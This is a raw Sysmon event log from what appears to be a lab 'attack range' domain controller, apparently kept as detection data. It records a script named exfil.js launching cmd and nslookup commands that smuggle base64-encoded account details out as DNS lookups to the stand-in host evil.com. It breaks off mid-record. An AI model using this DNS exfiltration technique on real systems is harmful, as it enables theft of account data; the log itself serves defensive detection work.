154100x8000000000000000201153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.832{2E1864BB-17C1-629A-BB40-000000005F02}7488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-B940-000000005F02}7392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllzr.tmp 2>&1 10341000x8000000000000000201152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.815{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-BA40-000000005F02}4760C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.815{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-BA40-000000005F02}4760C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.796{2E1864BB-17C1-629A-BA40-000000005F02}47606488C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B940-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.796{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BA40-000000005F02}4760C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B940-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-17A1-629A-783D-000000005F02}55524632C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-B940-000000005F02}7392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.794{2E1864BB-17C1-629A-B940-000000005F02}7392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllzr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.780{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsidgc.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52787-false127.0.0.1-53domain 354300x8000000000000000201139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52787- 354300x8000000000000000201138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52787-false127.0.0.1-53domain 354300x8000000000000000201137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52786-false127.0.0.1-53domain 354300x8000000000000000201136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52786- 354300x8000000000000000201135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52786-false127.0.0.1-53domain 354300x8000000000000000201134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.358{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52785-false127.0.0.1-53domain 354300x8000000000000000201133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52785- 354300x8000000000000000201132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.357{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52785-false127.0.0.1-53domain 354300x8000000000000000201131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.285{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52784-false127.0.0.1-53domain 354300x8000000000000000201130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.285{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52784- 354300x8000000000000000201129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.285{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52784-false127.0.0.1-53domain 354300x8000000000000000201128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.284{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52783-false127.0.0.1-53domain 354300x8000000000000000201127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.284{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52783- 354300x8000000000000000201126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.284{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52783-false127.0.0.1-53domain 354300x8000000000000000201125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.283{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52782-false127.0.0.1-53domain 354300x8000000000000000201124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.283{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52782- 354300x8000000000000000201123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.283{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52782-false127.0.0.1-53domain 354300x8000000000000000201122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.173{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52781- 354300x8000000000000000201121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.172{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52780-false127.0.0.1-53domain 354300x8000000000000000201120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.172{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52780- 354300x8000000000000000201119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.172{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52780-false127.0.0.1-53domain 354300x8000000000000000201118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.171{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52779-false127.0.0.1-53domain 354300x8000000000000000201117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.171{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52779- 354300x8000000000000000201116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.171{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52779-false127.0.0.1-53domain 22542200x8000000000000000201115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.525{00000000-0000-0000-0000-000000000000}7788evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.437{00000000-0000-0000-0000-000000000000}3964evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.360{00000000-0000-0000-0000-000000000000}7744evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.285{00000000-0000-0000-0000-000000000000}7144evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.173{00000000-0000-0000-0000-000000000000}2128evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.071{00000000-0000-0000-0000-000000000000}4832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.998{00000000-0000-0000-0000-000000000000}3448evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.908{00000000-0000-0000-0000-000000000000}4596evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-17C1-629A-B740-000000005F02}6848708C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-B840-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-B840-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.749{2E1864BB-17C1-629A-B640-000000005F02}78965740C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-B840-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.752{2E1864BB-17C1-629A-B840-000000005F02}6856C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-B640-000000005F02}7896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsidgc.tmp 2>&1 10341000x8000000000000000201099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.717{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-B740-000000005F02}6848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 